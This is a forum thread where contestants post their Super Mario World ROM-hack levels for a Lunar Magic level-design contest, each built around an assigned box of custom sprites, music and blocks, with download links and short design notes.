Neither did I but I've got a feeling that you'll score higher anyway. ^^

Edit: Okay, just attempted your level. We've got two more or less difficult ones that didn't use mystery boxes by now. If this gets letsplayed, the beginning videos are gonna be hell.

I've been building this over the week. I hope I do very well, considering how much thought had to go into the idea (mainly with the custom sprite that I've never used before). Does the box number need to be given out?
TalkhausMAGL22013.ips
Edit: My folder said 3 on it. I guess that means I got box 3?

I would've liked to take this further but for some reason the stupid Beezo guy I got in my box screwed everything up so I made pretty much all the difficulty rely on platforming. There's like, a million ways this level can go wrong but whatever.

I've gotten sick of spending a bunch of time on the level, subconsciously shift-deleting something I needed, and then having to redo my last hour of work.

Box 70 here, with a finished level:

http://www.mediafire.com/?u2xp7cg0dg11ard

The inserting custom stuff step of making the level was just pure hate, had the help of others just to get started. limepie was a lot of help, and Frozelar especially really helped, without them, I would of just rage quit and never completed it.

I think it turned out pretty well for my very first level made in Lunar Magic.

Making the actual level was really easy and fun to do, since it's all purely visual. If there's even a slight bit of coding or programing, I seem to flop around helplessly and not be able to do anything about it. (Which is the reason why I didn't put a mid point in this level, I have no idea how to do that, so I just built a level around not having a mid point.)

When making the level, I didn't want to use savestates, didn't even experiment with them, because I didn't want to screw anything up, so the difficulty of the entire level was nerfed many, many times, since I had to play through it so many times as tiny mario.

I didn't actually add the mushrooms or dragon coins until I was done with it, ironically enough, since the mushrooms probably would of helped in the building process.

I couldn't figure out how to put the mushrooms in boxes, so I just left them on the floor. The green mushroom is there to prevent game overs.

That red mushroom helps so much, I can beat the level pretty much every single time I try it now, which means it's not an overly difficult level, but I still left plenty enough traps so that it's not overly easy as well.

Spoilers for raocow, please don't read Mr. Cow of Rao:
There's actually two exits for this level, one if you bring the chomp rock, and one if you don't.

If you bring along the chomp rock, the level ends normally as it should, but if you don't, you'll be slammed into a wall and die.

The traps in this level have actually been purposely designed around raocow in mind, and more than likely, I predict he'll try to not bring the rock all the way to the end, since even though it's possible, it should be intentionally difficult to do so on your first try.

When he gets the false exit, he will pass by and see the real exit, and when he dies from the wall, he should be laughing or going, "ooooh, I actually need the rock" in some way.

I tried my best to cow proof the end, and make it impossible for him to brute force his way through like several puzzles the cow man does, so the rock should be necessary. I'll probably shit bricks if he finds some way to brute force his way through and get the actual exit without the chomp rock.

Many hours where put into editing, and re editing over and over that ending part, since my first several ideas I had for that could be done without having the rock.

By the way it's set up, it shouldn't be possible to build up enough speed to make it up and over with just Yoshi, but it should also be extremely easy to get up there if you have the rock.

I went through several tests and predictions to create a level with the sole purpose of screwing around with raocow, so I can't wait for him to play it, haha. He should be struggling with it, but it's easy enough to the point where it won't be utter torture.

This is pretty much a level made with the box materials with the reactions of raocow in mind, just to sum up everything in one sentence. Regardless of if it's a good level or not, I just really wanna see raocow's reactions, haha.

Alrighty!

Finally finished my level. I used each of the boxed items, changed them up a bit, but they're all intact.

Box 22; name's SlurryMoon; and the level is Kamek's Luau!

Hope this does well. I look forward to the scores soon!
And if for some reason the attachment doesn't work, I would very much appreciate it if you PM'd me and let me know. I would hate for that to be my downfall here.

Anyway, thanks for holding this contest!!
Everything's alright. Just look to the moon. And sing a soothing tune.~

Hah, sorry about the music. It was my first time porting a midi. And sorry my box wasn't integrated more, I was having a lot of trouble getting the stuff to function properly. And sorry about everything else, hah.

It was a lot of fun, though. I can't wait to see what other people did with their levels.

EDIT: Box 81, by the way.

Here is my level! It is called SPORT.

Direct: http://agargara.com/files/agargara-SPORT.zip
Mirror: http://www.mediafire.com/download.php?uw422j51dk7tneo

This was my first time making a level in Lunar Magic, or in anything for that matter. I had a lot of fun making the level, but I think I had even more fun making the short little music loop for the overworld. I would spend even more time on it but it wouldn't win me any points!

I had box 49: flying muncher graphics, a custom block that gives you successive power-ups, and Deku Palace music (which I don't personally care for, but you work with what you get!)

Here is my MaGL II level submission box 28, Flame Frost Hollow. It has two exits and is about world 6 or 7 difficulty of a Japanese hack. Also included is a bonus "level" and a life farm to remove chance of those pesky game overs appearing that I was too lazy to edit.

Sure to win top 58!

Edit: Should work on all emulators known to man also and including an actual SNES
Edit2: Features 6 dragon coins (!), a 1-up, and a moon

I have a thing.
It still doesn't work in SNES9X for reasons I don't know of and the music is my first experience with music port-type thing-making - which quite obviously means 100% quality guaranteed - but as long as you're deaf and use zsnes or bsnes it's a thing that one could potentially call a level.

...Unless it breaks anyway. It shouldn't, I've tested this thing repeatedly, but far more inexplicable things have happened in the process of making this thing. Seems fine on my end, though.

e: Also in case you couldn't tell by the file name I had box 13.

Here's mine, hopefully it'll do well. I ended up forgetting about it until a few days ago. ^^;

And if you can't tell by the file name, I had box 41.

EDIT: Small update because I forgot about overworld events. Not really important, but it was bugging me.

It's 3am and I finally done with my level! I had box 36. It was fun to make and that's the longest level that I ever made in Lunar Magic. Learned some things during this 1-month production too. Anyway, my level is done! Enjoy!

I sadly enough did not finish the romhack. It started out pretty good, but I got struck on time by a lot of things: exams, MTG tournaments, friends coming over, family birthdays and lots more. So I'm giving it in at the state it is right now. You can still finish the level. The secret exit was a time race using one of the box items but it leads to the bonus room of eternal lottery.

I had box 72.
-infinite P-switch script-
-cave story waterway tileset- (unused)
-piledriver sprite-

I feel like I have created some kind of... spiky pinball abomination. I'm pretty sure I'm done, but I've been having issues with sprite limitations that I'm not sure are entirely resolved. Doesn't stop the level being totally playable though!

- 1 exit only, no secrets here!
- 5 Dragon Coins placed in locations which require effort, not part of the 'main sequence'!
- Hidden and unexpected trivia!
- MOON!
- Silly name which is mostly irrelevant!
- ASM, sprites and graphics to their respective coders, rippers and original artists (i lost track of some of my early patches)
- My literally first-ever hack! I didn't even make a tutorial-guided level before this!
-

Good luck have fun praise the sun, I'm gonna pass out now.
BOB is an acronym for BOB is Only BOB etc.
